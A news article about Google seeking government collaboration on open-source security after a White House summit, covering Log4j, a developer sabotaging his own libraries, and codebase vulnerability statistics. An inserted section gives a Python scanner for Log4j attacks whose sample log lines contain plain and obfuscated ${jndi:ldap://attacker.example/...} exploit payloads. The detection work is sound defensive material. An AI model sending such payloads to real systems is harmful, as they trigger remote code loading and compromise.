Google wants to increase government collaboration to secure open-source


Google says that it wants to increase government collaboration to help secure open source after participating in a White House summit.

On Thursday, Google participated in the White House Open Source Software Security Summit, with the stated aim of building on its work with the Administration to strengthen America's collective cybersecurity in critical areas such as open-source software.

The past year has been particularly bad for open-source security problems, with several even making national headlines. This year has not begun much better.


Open-source is broken

While it was technically uncovered in December, the fallout from the Log4j vulnerability has continued into the new year. The vulnerability, in an open-source Java logging library used by apps and services across the internet, enables attackers to break into systems, steal passwords and logins, extract data, and infect networks with malicious software.

The Log4j vulnerability appears to have been an accidental bug rather than sabotage, and a patched version has since been released, although many apps and services have yet to apply it. Some open-source issues, however, are introduced on purpose.
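The detection check a practitioner would want here, as an added example and not code from the article, Google or the summit: Log4j 2 expanded `${...}` lookups inside logged strings, and the exploit payload is a `${jndi:...}` lookup pointing at an attacker-controlled LDAP or RMI server, typically wrapped in nested `${lower:...}` or `${::-...}` lookups to evade a naive search for `${jndi:`. The scanner below collapses those obfuscation lookups the way Log4j would before matching. The log lines and hostnames are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Constructed sample access-log lines; no real system or host is represented.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET /login HTTP/1.1" 200 612 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET /?x=${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /docs HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

# An innermost ${...} lookup: no nested '$', '{' or '}' inside the braces.
_INNER_LOOKUP = re.compile(r"\$\{([^${}]*)\}")

# A jndi lookup with its scheme (ldap, ldaps, rmi, dns, ...), up to the closing brace.
_JNDI = re.compile(r"\$\{\s*jndi\s*:\s*(\w+)[^}]*\}", re.IGNORECASE)


def _resolve_inner(lookup: str) -> Optional[str]:
    """Approximate Log4j's expansion of one innermost lookup.

    Only the lookups attackers use for obfuscation are modelled; anything
    else (including the jndi lookup itself) returns None and is left as-is.
    """
    if lookup.startswith("lower:"):
        return lookup[len("lower:"):].lower()
    if lookup.startswith("upper:"):
        return lookup[len("upper:"):].upper()
    if ":-" in lookup:
        # ${name:-default}: an unknown or empty name yields the default text,
        # so ${::-j} expands to "j".
        return lookup.split(":-", 1)[1]
    return None


def normalize(text: str) -> str:
    """Collapse nested obfuscation lookups until the text stops changing."""
    prev = None
    while prev != text:
        prev = text

        def repl(m: re.Match) -> str:
            resolved = _resolve_inner(m.group(1))
            return m.group(0) if resolved is None else resolved

        text = _INNER_LOOKUP.sub(repl, text)
    return text


def scan_line(line: str) -> Optional[Dict]:
    """Return details of a jndi lookup in the line, or None if there is none."""
    norm = normalize(line)
    m = _JNDI.search(norm)
    if not m:
        return None
    return {
        "scheme": m.group(1).lower(),
        "lookup": m.group(0),
        "obfuscated": norm != line,  # True when nested lookups hid the payload
    }


def scan_log(lines: List[str]) -> List[Dict]:
    """Scan log lines and return one hit per line carrying a jndi lookup."""
    hits = []
    for line_no, line in enumerate(lines, start=1):
        hit = scan_line(line)
        if hit is not None:
            hit["line_no"] = line_no
            hits.append(hit)
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG_LINES):
        print(f"line {hit['line_no']}: {hit['scheme']} lookup "
              f"{'(obfuscated) ' if hit['obfuscated'] else ''}{hit['lookup']}")
```

The normalization step matters more than the final regex: a rule that only matches the literal `${jndi:` misses lines 3 and 4 of the sample, which is exactly the variant traffic seen once the first signatures were deployed. Treat a hit as an attempt, not a confirmed compromise; whether the lookup was expanded depends on the Log4j version the logging application runs.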

Just earlier this week, Developer reported on an open-source developer who corrupted two of his popular libraries so that they indefinitely print gibberish messages to the consoles of apps using them, rendering those apps useless. Then, of course, there was the SolarWinds fiasco last year; strictly a compromise of a proprietary vendor's build pipeline rather than of an open-source project, but the same class of software supply-chain attack.

Open source is key to modern software development. The benefits are numerous: it helps to speed up releases, avoid vendor lock-in, lower costs, and increase transparency, and many projects have a great community spirit (many also do not, but we will stick to the positives!)

According to the Synopsys 2021 Open Source Security and Risk Analysis (OSSRA) report, 98 percent of the audited codebases contained at least one open-source component, and open-source code made up 75 percent of the audited code overall.

However, 84 percent of codebases were found to have at least one vulnerability, with an average of 158 per codebase. The average vulnerability found was 2.2 years old.

The lack of payment for his work is one reason the aforementioned open-source developer corrupted his own libraries.

"Respectfully, I am no longer going to support Fortune 500s (and other smaller sized companies) with my free work," he wrote in a post on his project's GitHub. "Take this as an opportunity to send me a six-figure yearly contract or fork the project and have someone else work on it."
